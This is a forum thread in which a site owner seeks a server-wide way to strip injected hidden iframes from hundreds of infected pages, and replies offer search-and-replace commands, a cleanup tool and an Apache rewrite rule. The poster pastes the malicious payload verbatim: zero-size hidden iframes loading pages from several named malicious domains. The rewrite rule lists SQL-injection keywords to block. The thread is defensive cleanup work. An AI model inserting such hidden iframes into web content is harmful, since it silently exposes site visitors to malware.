How can you remove the iframe hack server wide?
I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.
Anyone know of I can possibly do this?
I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.
Thanks
hiOriginally Posted by DWHS.net
everything good writing is translated by google hehe, since I'm from chile and handling not much English but I want to help.
looks good would recommend you first remove the general iframe mind are embedded in the index when you delete, change the access codes and install this application
Installation » Anti-Gumblar
Depends on the hack. I have a file I found on the internet that cleans GNU-GPL and others with a few text changes, but to get it to work I have to make all the files writable. What I have been doing is making everything writable, running the fix file, download the directory to my computer (doubles as a virus checker also), deleting the files on the server and re uploading to reset permissions. I know it's a kludge but it has been working great. You will have to e-mail me for the file unless management don't mind me posting it here.
I tried this in httpd.conf but don't know if its working good or now
But after that I didn't suffer from iframe.Code:RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC] RewriteRule .* - [F]
Kindly check the below mentioned URL which might helps you to solve your issue:
How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files - Gabriel - Web Design, Development and Business … infopoet
I did this but I don't know what do after it's installed. How do I run it to remove the thousands of pages infected?
Or is this just to prevent it?
Also here is the code of this helps:
<iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Last edited by DWHS.net; 02-09-2010 at 09:07 PM.
Try using the sed command combined with find and xargs.
Find and Replace with Sed
Not sure im afraid you might have to remove the iframe manually :-(
Hi,
I had a similar problem and this link helped.
Linux - Search and replace over multiple files.
LinkBack URL
About LinkBacks
Reply With Quote
